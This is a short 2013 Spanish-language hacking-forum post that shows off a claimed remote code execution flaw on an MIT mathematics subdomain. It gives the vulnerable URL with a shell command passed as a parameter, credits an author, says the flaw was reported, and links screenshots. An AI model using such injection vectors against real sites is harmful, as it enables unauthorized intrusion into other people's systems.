Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Enero 23, 2013, 10:46:06 PM

Título: Remote Execution http://math.mit.edu/ MIT
Publicado por: Muppet en Enero 23, 2013, 10:46:06 PM
Otro fallo de seguridad en otro subdominio del MIT que nos permite ejecutar codigo Arbitrario y Crear Archivos php.

(http://i45.tinypic.com/1y2vk8.png)

(http://i50.tinypic.com/e66s1k.png)

Remote Execution:

Url del sitio: http://math.mit.edu/
Vector: http://math.mit.edu/~numericalmath/exec_php.php?eq=ls+-l
Autor: HD_Breaker
Reportado: SI

(http://i47.tinypic.com/28h3pmt.png)